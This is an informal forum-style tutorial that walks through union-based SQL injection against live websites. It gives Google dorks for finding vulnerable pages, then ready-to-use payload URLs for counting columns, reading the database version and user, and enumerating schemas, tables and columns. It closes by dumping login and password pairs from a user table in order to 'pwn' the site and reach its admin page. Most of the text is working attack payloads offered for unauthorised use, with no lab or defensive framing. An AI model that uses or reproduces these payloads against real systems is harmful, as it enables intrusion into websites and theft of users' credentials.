D34Th

1. SQL Injection
2.  
3. Right......... This is in depth tutorial with pics XD on how to do SQL injection correctly.
4.  
5. I take it you know what SQL injection is.... The basics I mean XD you wouldn't be here otherwise would you?
6.  
7. Let's get a cracking.
8.  
9.  
10. #1.Finding vulnerable sites
11. #2.Finding amount of columns
12. #3.Getting mysql version current user
13. #4.Getting Databases
14. #5.Getting Tables
15. #6.Getting Columns
16. #7.Getting Usernames and Passwords
17.  
18. Let's do this mofo's
19.  
20. #1.
21.  
22. You can't SQL a site unless you first locate one, "How do we do this?"" Is the question rolling around your heads, Well...... We use something called a Dork "I beg your pardon, Do this mofo call me a dork" A Google dork XD,It's what can be used in order to locate vulnerable sites through the google search engine.
23.  
24. A list of common used google dorks:
25. inurl:index.php?id=
26. inurl:news.php?id=
27. inurl:category.php?id=
28. inurl:games.php?id=
29. inurl:forum.php?tid=
30. inurl:newsletter.php?id=
31. inurl:content.php?id=
32.  
33. I've found my vulnerable site, Now wtf do I do....... Well the common answer to that question is to check if it's vulnerable, In order to do this we add a ' at the end.
34.  
35. So for example:
36. http://examplesite.com/news/view.php?id=828
37.  
38. ^ ^ That's the site I found (Remember this is a example)
39.  
40. All we do is add a '
41. Like so:
42. http://examplesite.com/news/view.php?id=828'
43.  
44. We can add the ' before or after the numbers, It still checks if it is vulnberable.
45.  
46. How do I know if it's vulnerable, Well you will see something like this:
47. http://img220.imageshack.us/img220/6660/sqlitut1.jpg
48.  
49. Notice the SQL error? That is exactly what we are after, Now it's time to move onto Step 2.
50.  
51. #2. Finding amount of columns
52. In order to find the ammount of columns we have to use a orderby statement, The concept behind it is pretty simple, We keep ordering by until a error is received, So....
53.  
54. http://examplesite.com/news/view.php?id=828 order by 1-- (page loads normal)
55. http://examplesite.com/news/view.php?id=828 order by 2-- (page loads normal)
56. http://examplesite.com/news/view.php?id=828 order by 3-- (page loads normal)
57. http://examplesite.com/news/view.php?id=828 order by 4-- (page loads normal)
58. http://examplesite.com/news/view.php?id=828 order by 5-- (page loads normal)
59. http://examplesite.com/news/view.php?id=828 order by 6-- (page loads normal)
60. http://examplesite.com/news/view.php?id=828 order by 7-- (page loads normal)
61. http://examplesite.com/news/view.php?id=828 order by 8-- (page loads normal)
62. http://examplesite.com/news/view.php?id=828 order by 9-- (error)
63.  
64. (Don't actually but the page loads normal part) I was just showing you how it shows a error)
65.  
66. Alright so we received a error on column 9, This means we have 8 columns, "But you received the error on 9?" Yes true, But every page before that loaded fine, So it's 8 columns.
67.  
68. So you've found out how many columns it is now what is next?
69.  
70. Next is union select statements,
71.  
72. http://examplesite.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
73.  
74. (Make note of the hyphen before the numbers)
75.  
76. You should see numbers on the site like so:
77. http://img842.imageshack.us/img842/5738/sqlitut2.jpg
78.  
79. This proves to us, That this site is vulnerable to SQL injection, Now it's time we #3 mofo's XD.
80.  
81. #3. Getting MySQL version and Current User
82. So we've worked out the columns and displayed the column numbers on the screen, Next is getting the SQL version and the current user.
83.  
84. To do these we use this SQL command:
85. http://examplesite.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--
86.  
87. (Make note that we've used column 3 to display the SQL version)
88. http://img823.imageshack.us/img823/8895/sqlitut3.jpg
89.  
90. 5.0.22 this mofo site is vulnerable, (if its under 4 then you have to guess tables and columns) Majority are over 5 anyway.
91.  
92. Next, Let's get the current user on this thing, To do that we type in:
93.  
94. http://examplesite.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
95.  
96. Notice the user() command? The same place in which we put @@version number before?
97.  
98. If you've done correctly you should see something like this:
99. http://img690.imageshack.us/img690/611/sqlitut4.jpg
100.  
101. Now comes the interesting stuff.......... Let's hit up part #4.
102.  
103.  
104. #4. Getting Databases
105. Now is the cool stuff we now want to get the database and the current database, To do this we use:
106.  
107. http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--
108.  
109. Notice the group_concat(schema_name) is in number 3 again? This will display the information we are after:
110.  
111. http://img864.imageshack.us/img864/1689/sqlitut5.jpg
112.  
113. The current database, It's pretty obvious but hey.... comes in handy XD,
114.  
115. To view the current database use this syntax:
116.  
117. http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8
118.  
119.  
120. You should receive something like this:
121. http://img194.imageshack.us/img194/7368/sqlitut6.jpg
122.  
123. Like I said, Pretty obvious haha
124.  
125. So we've worked out the database name, Now we want those mofo tables, Let's move onto #5.
126.  
127. #5. Getting Tables
128. In order to get the tables we will continue using that handy union select command,
129.  
130. http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--
131.  
132. Before we move on, I want you to study that syntax, take note of the commands used there, The database etc etc.
133.  
134. If you've done that correctly you should receive something like this:
135. http://img830.imageshack.us/img830/3971/sqlitut7.jpg
136.  
137. I've put a box round the user table, Cause well....... You don't SQL a site without wanting to get the user table XD
138.  
139. Judging from the other tables, I can safely say the passwords and users will all be in the bpuser table, Scribble this name down and let's move on to part #6.
140.  
141. #6. Getting Columns
142. So we've found our user table now we want the columns out of it, How do we do this you ask, Well... It's pretty simple.
143.  
144. http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
145.  
146. As before, I want you to read through the syntax, Try and understand what everything is doing in there?
147.  
148. Right... If you have done that correctly, You should receive something like this:
149. http://img24.imageshack.us/img24/8813/sqlitut8.jpg
150.  
151. Notice the 2 tables I've highlighted? These contain the info we want for gaining access XD.
152.  
153. #7. Dumping users/pass
154. So you've found your site, Found the columns,database,tables etc etc now I bet you wanna pwn this mofo, So now we are going to dump the info from login and password, To do this we simply:
155.  
156. http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--
157.  
158. Right this syntax is a lot more complex than the others, Therefore as before, Read through it and try to work out what is being done?
159.  
160. (NOTE: 0x3a will make a : between logins and passwords.)
161.  
162. If you've done this correctly you should receive something similar to this:
163. http://img145.imageshack.us/img145/4508/sqlitut9.jpg
164.  
165.  
166. YEAH!!!!!!! there is that mofo admin's details.
167.  
168. Congratulations, You have now officially 'parred' the site, Now all is required is to find the admin page.